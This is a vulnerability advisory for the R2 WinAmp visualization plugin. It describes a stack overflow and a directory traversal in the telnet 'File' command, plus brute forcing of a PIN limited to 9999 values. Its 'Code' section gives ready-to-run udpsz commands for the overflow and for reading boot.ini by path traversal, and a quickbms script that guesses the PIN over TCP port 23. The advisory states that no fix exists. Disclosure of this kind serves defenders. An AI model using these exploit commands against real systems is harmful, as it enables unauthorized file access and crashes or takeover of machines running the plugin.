####################################################################### Luigi Auriemma Application: R2 http://www.rabidhamster.org/R2/ Versions: <= 1.65 Platforms: Windows Bugs: A] stack overflow B] directory traversal C] PIN brute forcing Exploitation: remote Date: 09 Feb 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "R2/Extreme is a plugin for the WinAmp music player. It produces animated 3D graphics in real-time that twist and turn with the music. Now used in nightclubs, parties, and even (apparently) a canadian stripclub, R2 has become known for its fast, fluid visuals." ####################################################################### ======= 2) Bugs ======= The registered version of R2 has a telnet port active by default and uses a PIN number with a very limited range, from 1 to 9999. The result is that it's enough to make a simple scanning of 9999 tries to find the correct PIN and being able to exploit the following vulnerabilites. There are no IP bannings or other limitations, just check the "UNLOCKED" reply to know what is the right PIN. ----------------- A] stack overflow ----------------- Stack overflow through the "File" command. ---------------------- B] directory traversal ---------------------- Directory traversal exploitable through the "File" command that allows to view the files on the disk in which is installed the software. -------------------- C] PIN brute forcing -------------------- As explained in the introduction it's possible to brute force the PIN number very easily being only 9999 those available. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip 1234 is the default PIN number, change it accordingly with the one found through the brute forcing scanner. A] udpsz -T -b a -c "1234\r\nFile([" 0 -c "])\r\n" -1 -D -3 SERVER 23 4000 B] udpsz -T -b a -c "1234\r\nFile([../../../../../../boot.ini])" -D -3 SERVER 23 -1 C] http://aluigi.org/papers/quickbms.zip ### beginning of the script r2_1c.bms ### for i = 1 <= 9999 print "scan PIN %i%" put i line do get TEXT line if TEXT == "UNLOCKED" print "PIN found: %i%" cleanexit endif while TEXT != "NOT UNLOCKED" next i ### end of the script ### quickbms -n r2_1c.bms tcp://SERVER:23 ####################################################################### ====== 4) Fix ====== No fix. #######################################################################